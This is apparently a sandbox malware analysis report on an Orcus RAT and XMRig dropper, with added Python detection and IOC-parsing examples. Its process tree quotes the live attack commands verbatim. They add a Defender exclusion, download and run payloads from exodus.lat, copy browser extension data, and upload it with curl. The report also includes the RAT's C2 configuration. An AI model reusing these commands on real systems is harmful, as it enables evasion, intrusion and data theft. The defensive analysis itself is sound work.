Windows Analysis Report
DM6vAAgoCw.exe

Overview

General Information

Sample name: DM6vAAgoCw.exe (renamed because the original name is a hash value)
Original sample name: a67e34baacfca98f323981d3b0087f3b.exe
Analysis ID: 1569756
MD5: a67e34baacfca98f323981d3b0087f3b
SHA1: d22ccae2971df83812acaebc750d9a2c87357fe5
SHA256: 6092579a997945b10d3f279693baa004d180417ccfec941c45eb20705a2b4706
Tags: exe, user-abuse_ch

Detection

Orcus, Xmrig
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Yara detected AntiVM3
Yara detected Orcus RAT
Yara detected Powershell download and execute
Yara detected Xmrig cryptocurrency miner
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates multiple autostart registry keys
Drops PE files with a suspicious file extension
Injects a PE file into foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Powershell drops PE file
Protects its processes via BreakOnTermination flag
Reads the Security eventlog
Reads the System eventlog
Sample is not signed and drops a device driver
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: System File Execution Location Anomaly
Sigma detected: WScript or CScript Dropper
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript called in batch mode (suppresses errors)
Yara detected Costura Assembly Loader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates driver files
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains sections with non-standard names
PE file does not import any functions
Potential key logger detected (key state polling based)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potential Browser Data Stealing
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Process Tree

  • System is w10x64
  • DM6vAAgoCw.exe (PID: 3420 cmdline: "C:\Users\user\Desktop\DM6vAAgoCw.exe" MD5: A67E34BAACFCA98F323981D3B0087F3B)
    • cmd.exe (PID: 4188 cmdline: "C:\Windows\System32\cmd.exe" /c copy Audit Audit.cmd && Audit.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 2436 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 5760 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 1828 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 5368 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 1340 cmdline: cmd /c md 491505 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • cmd.exe (PID: 2536 cmdline: cmd /c copy /b ..\Dentists + ..\Flavor + ..\Disturbed + ..\Artistic + ..\Justice + ..\Proceeds + ..\Zip + ..\Soundtrack + ..\Revenue B MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Dr.com (PID: 4632 cmdline: Dr.com B MD5: 6EE7DDEBFF0A2B78C7AC30F6E00D1D11)
        • cmd.exe (PID: 616 cmdline: cmd /c schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 2976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • schtasks.exe (PID: 4052 cmdline: schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
        • schtasks.exe (PID: 3632 cmdline: schtasks.exe /create /tn "ApolloPro" /tr "wscript //B 'C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc onlogon /F /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
          • conhost.exe (PID: 5832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • RegAsm.exe (PID: 6884 cmdline: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe MD5: 0D5DF43AF2916F47D00C1573797C1A13)
          • cmd.exe (PID: 6352 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\download.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 2680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • net.exe (PID: 5348 cmdline: net session MD5: 31890A7DE89936F922D44D677F681A7F)
              • net1.exe (PID: 4388 cmdline: C:\Windows\system32\net1 session MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
            • powershell.exe (PID: 1020 cmdline: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\asm'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • powershell.exe (PID: 6596 cmdline: powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\user\AppData\Local\asm\COMSurrogate.exe') }" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • powershell.exe (PID: 2876 cmdline: powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Users\user\AppData\Local\asm\COMSurrogate.exe' -WindowStyle Hidden" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
              • COMSurrogate.exe (PID: 4916 cmdline: "C:\Users\user\AppData\Local\asm\COMSurrogate.exe" MD5: 77334F046A50530CDC6E585E59165264)
          • cmd.exe (PID: 1808 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\checkmiexe.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 2784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • net.exe (PID: 1816 cmdline: net session MD5: 31890A7DE89936F922D44D677F681A7F)
              • net1.exe (PID: 3088 cmdline: C:\Windows\system32\net1 session MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
            • powershell.exe (PID: 4208 cmdline: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\asm'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • powershell.exe (PID: 7160 cmdline: powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\user\AppData\Local\asm\COMSurrogate.exe') }" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • powershell.exe (PID: 3416 cmdline: powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Users\user\AppData\Local\asm\COMSurrogate.exe' -WindowStyle Hidden" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • cmd.exe (PID: 3928 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\runsteal.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 2128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 6920 cmdline: powershell -Command "Invoke-WebRequest -Uri 'https://exodus.lat/ss.bat' -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_script.bat' -UseBasicParsing" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • cmd.exe (PID: 6328 cmdline: cmd.exe /c "C:\Users\user\AppData\Local\Temp\downloaded_script.bat" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 6644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • xcopy.exe (PID: 6556 cmdline: xcopy /E /I "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\*" "C:\Users\user\AppData\Local\Temp\ArchiveContents\Chrome\" MD5: 7E9B7CE496D09F70C072930940F9F02C)
              • xcopy.exe (PID: 2716 cmdline: xcopy /E /I "C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\*" "C:\Users\user\AppData\Local\Temp\ArchiveContents\Edge\" MD5: 7E9B7CE496D09F70C072930940F9F02C)
              • cmd.exe (PID: 5552 cmdline: C:\Windows\system32\cmd.exe /c curl -s https://api.ipify.org MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • curl.exe (PID: 2016 cmdline: curl -s https://api.ipify.org MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
              • powershell.exe (PID: 1924 cmdline: powershell -command "Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\ArchiveContents\*' -DestinationPath 'C:\Users\user\AppData\Local\Temp\N_user_8.46.123.228.zip'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
              • cmd.exe (PID: 2036 cmdline: C:\Windows\system32\cmd.exe /c curl -F "file=@C:\Users\user\AppData\Local\Temp\N_user_8.46.123.228.zip" "https://exodus.lat/files/upload.php" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • curl.exe (PID: 6292 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Temp\N_user_8.46.123.228.zip" "https://exodus.lat/files/upload.php" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
          • smartscreen.exe (PID: 712 cmdline: "C:\Users\user\AppData\Local\Temp\smartscreen.exe" MD5: 1FED66D1F6B85BDA20FE0403CA01C9BD)
      • choice.exe (PID: 5412 cmdline: choice /d y /t 15 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • wscript.exe (PID: 1224 cmdline: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • ApolloPro.scr (PID: 4016 cmdline: "C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr" "C:\Users\user\AppData\Local\CreativePixel Tech\E" MD5: 6EE7DDEBFF0A2B78C7AC30F6E00D1D11)
  • smartscreen.exe (PID: 2488 cmdline: "C:\Users\user\AppData\Local\Temp\smartscreen.exe" MD5: 1FED66D1F6B85BDA20FE0403CA01C9BD)
  • COMSurrogate.exe (PID: 912 cmdline: "C:\Users\user\AppData\Local\asm\COMSurrogate.exe" MD5: 77334F046A50530CDC6E585E59165264)
  • smartscreen.exe (PID: 5172 cmdline: "C:\Users\user\AppData\Local\Temp\smartscreen.exe" MD5: 1FED66D1F6B85BDA20FE0403CA01C9BD)
  • COMSurrogate.exe (PID: 3132 cmdline: "C:\Users\user\AppData\Local\asm\COMSurrogate.exe" MD5: 77334F046A50530CDC6E585E59165264)
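Read top to bottom, the tree is the whole detection story: a batch loader checks for security products with tasklist | findstr, reassembles its payload with copy /b and runs it through Dr.com, a renamed RegAsm.exe under %TEMP% launches batch files that first add a Defender exclusion for a folder, then download into that folder and execute from it, a scheduled task runs wscript //B with /RL HIGHEST, browser profile data is staged with xcopy, zipped and pushed out with curl -F, and smartscreen.exe from %TEMP% writes its own Run value. Each of those command lines is noisy on its own; the combination is not. The following Python is an added example, not code from the Joe Sandbox report: it runs a small rule set over process-creation events constructed from the PIDs and command lines quoted in the tree (a subset of its nodes). The image paths of the Windows binaries, the rule names, the ATT&CK mapping and the verdict threshold are this example's own assumptions.

```python
"""Rules over process-creation events for the loader chain in the tree above.

Added example, not code from the Joe Sandbox report. EVENTS is constructed
from PIDs and command lines quoted in the tree (a subset of its nodes); image
paths of Windows binaries, rule names, the ATT&CK mapping and the verdict
threshold are this example's own assumptions.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [  # constructed from the report's process tree
    ProcEvent(3420, 1, r"C:\Users\user\Desktop\DM6vAAgoCw.exe", r'"C:\Users\user\Desktop\DM6vAAgoCw.exe"'),
    ProcEvent(4188, 3420, r"C:\Windows\SysWOW64\cmd.exe", r'"C:\Windows\System32\cmd.exe" /c copy Audit Audit.cmd && Audit.cmd'),
    ProcEvent(5760, 4188, r"C:\Windows\SysWOW64\findstr.exe", 'findstr /I "wrsa opssvc"'),
    ProcEvent(5368, 4188, r"C:\Windows\SysWOW64\findstr.exe", 'findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"'),
    ProcEvent(4632, 4188, r"C:\Users\user\AppData\Local\Temp\491505\Dr.com", "Dr.com B"),
    ProcEvent(4052, 616, r"C:\Windows\SysWOW64\schtasks.exe", r'''schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST'''),
    ProcEvent(6884, 4632, r"C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe", r"C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe"),
    ProcEvent(1020, 6352, PS, r'''powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\asm'"'''),
    ProcEvent(6596, 6352, PS, r'''powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\user\AppData\Local\asm\COMSurrogate.exe') }"'''),
    ProcEvent(6920, 3928, PS, r'''powershell -Command "Invoke-WebRequest -Uri 'https://exodus.lat/ss.bat' -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_script.bat' -UseBasicParsing"'''),
    ProcEvent(6556, 6328, r"C:\Windows\SysWOW64\xcopy.exe", r'xcopy /E /I "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\*" "C:\Users\user\AppData\Local\Temp\ArchiveContents\Chrome\"'),
    ProcEvent(6292, 2036, r"C:\Windows\SysWOW64\curl.exe", r'curl -F "file=@C:\Users\user\AppData\Local\Temp\N_user_8.46.123.228.zip" "https://exodus.lat/files/upload.php"'),
    ProcEvent(712, 6884, r"C:\Users\user\AppData\Local\Temp\smartscreen.exe", r'"C:\Users\user\AppData\Local\Temp\smartscreen.exe"'),
]

# Security-product process names the loader's findstr filters look for.
AV_NAMES = ("wrsa", "opssvc", "avastui", "avgui", "bdservicehost", "nswscsvc", "ekrn", "sophoshealth")
# Windows/.NET binary names the chain reuses outside their normal directories.
SYSTEM_NAMES = {"regasm.exe", "smartscreen.exe", "comsurrogate.exe"}
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files")  # assumed allow-list
ATTACK = {  # rule -> ATT&CK technique ID (from the public ATT&CK matrix)
    "av_process_enumeration": "T1518.001",
    "defender_exclusion": "T1562.001",
    "powershell_download": "T1105",
    "schtasks_hidden_wscript": "T1053.005",
    "browser_data_staging": "T1005",
    "curl_file_upload": "T1567",
    "system_name_in_user_path": "T1036.005",
}


def rules_for(ev: ProcEvent) -> set:
    """Return the names of all rules matching one process-creation event."""
    name = ev.image.rsplit("\\", 1)[-1].lower()
    low = ev.cmdline.lower()
    hits = set()
    if name == "findstr.exe" and any(av in low for av in AV_NAMES):
        hits.add("av_process_enumeration")
    if name == "powershell.exe":
        if re.search(r"add-mppreference\s+-exclusion", low):
            hits.add("defender_exclusion")
        if ".downloadfile(" in low or ("invoke-webrequest" in low and "-outfile" in low):
            hits.add("powershell_download")
    if (name == "schtasks.exe" and "/create" in low
            and re.search(r"wscript(\.exe)?\s+//b\b", low) and "/rl highest" in low):
        hits.add("schtasks_hidden_wscript")  # hidden script host, highest run level
    if name == "xcopy.exe" and "\\user data\\" in low and "\\appdata\\local\\temp\\" in low:
        hits.add("browser_data_staging")  # Chromium profile copied into %TEMP%
    if name == "curl.exe" and re.search(r'(^|\s)-f\s+"?file=@', low):
        hits.add("curl_file_upload")  # multipart file upload from the command line
    if name in SYSTEM_NAMES and not ev.image.lower().startswith(TRUSTED_PREFIXES):
        hits.add("system_name_in_user_path")
    return hits


def triage(events) -> dict:
    """Collect rule hits for a host: rule name -> PIDs in event order."""
    hits = {}
    for ev in events:
        for rule in sorted(rules_for(ev)):
            hits.setdefault(rule, []).append(ev.pid)
    return hits


def verdict(hits: dict) -> str:
    """One Defender exclusion can be admin work; three distinct techniques is not."""
    techniques = {ATTACK[rule] for rule in hits}
    if len(techniques) >= 3:
        return "malicious"
    return "suspicious" if techniques else "clean"


if __name__ == "__main__":
    found = triage(EVENTS)
    for rule, pids in found.items():
        print(f"{ATTACK[rule]:<10} {rule:<26} PIDs {pids}")
    print("verdict:", verdict(found))
```

The rules deliberately key on the shape of each command rather than on the domain or file names, which the operator changes per build; the sequence exclusion, download into the excluded folder, execute from it is what to alert on in a real pipeline, and the event order in triage() preserves it.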
Name: Orcus RAT
Description: Orcus has been advertised as a Remote Administration Tool (RAT) since early 2016. It has all the features that would be expected from a RAT and probably more. The long list of the commands is documented on their website. But what separates Orcus from the others is its capability to load custom plugins developed by users, as well as plugins that are readily available from the Orcus repository. In addition to that, users can also execute C# and VB.net code on the remote machine in real-time.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.orcus_rat

Name: xmrig
Description: According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling". In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
Malware Configuration

Orcus RAT (configuration extracted from the sample):
{
  "AutostartBuilderProperty": {
    "AutostartMethod": "Disable",
    "TaskSchedulerTaskName": "Orcus",
    "TaskHighestPrivileges": "true",
    "RegistryHiddenStart": "true",
    "RegistryKeyName": "Orcus",
    "TryAllAutostartMethodsOnFail": "true"
  },
  "ChangeAssemblyInformationBuilderProperty": {
    "ChangeAssemblyInformation": "false",
    "AssemblyTitle": null,
    "AssemblyDescription": null,
    "AssemblyCompanyName": null,
    "AssemblyProductName": null,
    "AssemblyCopyright": null,
    "AssemblyTrademarks": null,
    "AssemblyProductVersion": "1.0.0.0",
    "AssemblyFileVersion": "1.0.0.0"
  },
  "ChangeCreationDateBuilderProperty": {"IsEnabled": "false", "NewCreationDate": "2024-11-27T14:29:12"},
  "ChangeIconBuilderProperty": {"ChangeIcon": "false", "IconPath": null},
  "ClientTagBuilderProperty": {"ClientTag": null},
  "ConnectionBuilderProperty": {"IpAddresses": [{"Ip": "45.74.38.211", "Port": "4782"}]},
  "DataFolderBuilderProperty": {"Path": "%appdata%\\Orcus"},
  "DefaultPrivilegesBuilderProperty": {"RequireAdministratorRights": "false"},
  "DisableInstallationPromptBuilderProperty": {"IsDisabled": "true"},
  "FrameworkVersionBuilderProperty": {"FrameworkVersion": "NET45"},
  "HideFileBuilderProperty": {"HideFile": "false"},
  "InstallationLocationBuilderProperty": {"Path": "%programfiles%\\Orcus\\Orcus.exe"},
  "InstallBuilderProperty": {"Install": "false"},
  "KeyloggerBuilderProperty": {"IsEnabled": "false"},
  "MutexBuilderProperty": {"Mutex": "7a9c0f279c464958aebbd585f20f1cf2"},
  "ProxyBuilderProperty": {"ProxyOption": "None", "ProxyAddress": null, "ProxyPort": "1080", "ProxyType": "2"},
  "ReconnectDelayProperty": {"Delay": "10000"},
  "RequireAdministratorPrivilegesInstallerBuilderProperty": {"RequireAdministratorPrivileges": "true"},
  "RespawnTaskBuilderProperty": {"IsEnabled": "false", "TaskName": "Orcus Respawner"},
  "ServiceBuilderProperty": {"Install": "false"},
  "SetRunProgramAsAdminFlagBuilderProperty": {"SetFlag": "false"},
  "WatchdogBuilderProperty": {"IsEnabled": "false", "Name": "OrcusWatchdog.exe", "WatchdogLocation": "AppData", "PreventFileDeletion": "false"}
}
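Two things in this configuration matter for response. The client is built to connect to 45.74.38.211:4782 and guards itself with the mutex 7a9c0f279c464958aebbd585f20f1cf2. And every one of the RAT's own install and persistence options is switched off (Install false, AutostartMethod Disable, no service, no respawn task, no watchdog), so none of the autostart artifacts in the process tree (the scheduled tasks West and ApolloPro, the SmartScreen Run value) come from Orcus itself; they belong to the loader, and removing the RAT binary alone leaves them in place. The Python below is an added example, not from the report or from Orcus: it parses the configuration into IOCs and checks the observed persistence names against what the configuration would create. CONFIG_JSON is the configuration abridged to the fields used, the %var% expansion assumes a profile under C:\Users\user, and OBSERVED is taken from the tree and Sigma hits.

```python
"""Derive IOCs from the Orcus builder configuration shown above.

Added example, not from the Joe Sandbox report or from Orcus. CONFIG_JSON is
the report's extracted configuration abridged to the fields used here; the
%var% expansion assumes a user profile under C:\\Users; OBSERVED lists the
persistence names the process tree and Sigma hits show the loader creating.
"""
import json

CONFIG_JSON = r'''{
  "AutostartBuilderProperty": {"AutostartMethod": "Disable", "TaskSchedulerTaskName": "Orcus",
    "TaskHighestPrivileges": "true", "RegistryHiddenStart": "true", "RegistryKeyName": "Orcus",
    "TryAllAutostartMethodsOnFail": "true"},
  "ConnectionBuilderProperty": {"IpAddresses": [{"Ip": "45.74.38.211", "Port": "4782"}]},
  "DataFolderBuilderProperty": {"Path": "%appdata%\\Orcus"},
  "InstallationLocationBuilderProperty": {"Path": "%programfiles%\\Orcus\\Orcus.exe"},
  "InstallBuilderProperty": {"Install": "false"},
  "KeyloggerBuilderProperty": {"IsEnabled": "false"},
  "MutexBuilderProperty": {"Mutex": "7a9c0f279c464958aebbd585f20f1cf2"},
  "ReconnectDelayProperty": {"Delay": "10000"},
  "RespawnTaskBuilderProperty": {"IsEnabled": "false", "TaskName": "Orcus Respawner"},
  "ServiceBuilderProperty": {"Install": "false"},
  "WatchdogBuilderProperty": {"IsEnabled": "false", "Name": "OrcusWatchdog.exe",
    "WatchdogLocation": "AppData", "PreventFileDeletion": "false"}
}'''

# Autostart names observed in the report: two scheduled tasks and one Run value.
OBSERVED = {"West", "ApolloPro", "SmartScreen"}


def load_config(text: str) -> dict:
    return json.loads(text)


def expand(path: str, user: str = "user") -> str:
    """Expand the builder's %var% placeholders (assumed default Windows locations)."""
    table = {"%appdata%": rf"C:\Users\{user}\AppData\Roaming", "%programfiles%": r"C:\Program Files"}
    low = path.lower()
    for var, value in table.items():
        if low.startswith(var):
            return value + path[len(var):]
    return path


def c2_endpoints(cfg: dict) -> list:
    """(ip, port) pairs the client is built to connect to."""
    return [(e["Ip"], int(e["Port"])) for e in cfg["ConnectionBuilderProperty"]["IpAddresses"]]


def host_iocs(cfg: dict, user: str = "user") -> dict:
    """Host artifacts the client would create if its install options were on."""
    auto = cfg["AutostartBuilderProperty"]
    return {
        "mutex": cfg["MutexBuilderProperty"]["Mutex"],
        "data_folder": expand(cfg["DataFolderBuilderProperty"]["Path"], user),
        "install_path": expand(cfg["InstallationLocationBuilderProperty"]["Path"], user),
        "task_names": {auto["TaskSchedulerTaskName"], cfg["RespawnTaskBuilderProperty"]["TaskName"]},
        "run_value": auto["RegistryKeyName"],
        "watchdog_exe": cfg["WatchdogBuilderProperty"]["Name"],
    }


def persistence_enabled(cfg: dict) -> dict:
    """Which of the RAT's own install/persistence options the operator switched on."""
    return {
        "install": cfg["InstallBuilderProperty"]["Install"] == "true",
        "autostart": cfg["AutostartBuilderProperty"]["AutostartMethod"] != "Disable",
        "service": cfg["ServiceBuilderProperty"]["Install"] == "true",
        "respawn_task": cfg["RespawnTaskBuilderProperty"]["IsEnabled"] == "true",
        "watchdog": cfg["WatchdogBuilderProperty"]["IsEnabled"] == "true",
    }


def unexplained_persistence(cfg: dict, observed: set) -> set:
    """Observed autostart names the RAT config does not account for.

    Only names whose mechanism is enabled count as declared; whatever is left
    was created by something else (here the loader) and needs separate cleanup.
    """
    enabled = persistence_enabled(cfg)
    auto = cfg["AutostartBuilderProperty"]
    declared = set()
    if enabled["autostart"]:
        declared |= {auto["TaskSchedulerTaskName"], auto["RegistryKeyName"]}
    if enabled["respawn_task"]:
        declared.add(cfg["RespawnTaskBuilderProperty"]["TaskName"])
    return set(observed) - declared


if __name__ == "__main__":
    cfg = load_config(CONFIG_JSON)
    print("C2:", c2_endpoints(cfg))
    print("host IOCs:", host_iocs(cfg))
    print("persistence enabled:", persistence_enabled(cfg))
    print("loader-owned persistence:", unexplained_persistence(cfg, OBSERVED))
```

The split between declared and unexplained persistence is the practical output: the mutex and the C2 endpoint go to hunting and blocking, while the scheduled tasks and the Run value go on the cleanup list with the loader's dropped files, not with the RAT.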
Yara matches, dropped files (Source | Rule | Description | Author):
C:\Users\user\AppData\Local\Temp\download.bat | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
C:\Users\user\AppData\Local\Temp\downloaded_script.bat | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
C:\Users\user\AppData\Local\Temp\checkmiexe.bat | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
C:\Users\user\AppData\Local\Temp\smartscreen.exe | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
C:\Users\user\AppData\Local\asm\COMSurrogate.exe | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
(4 further entries not shown)

Yara matches, memory dumps (Source | Rule | Description | Author, with matched strings):
00000032.00000002.4565651226.0000021642F31000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
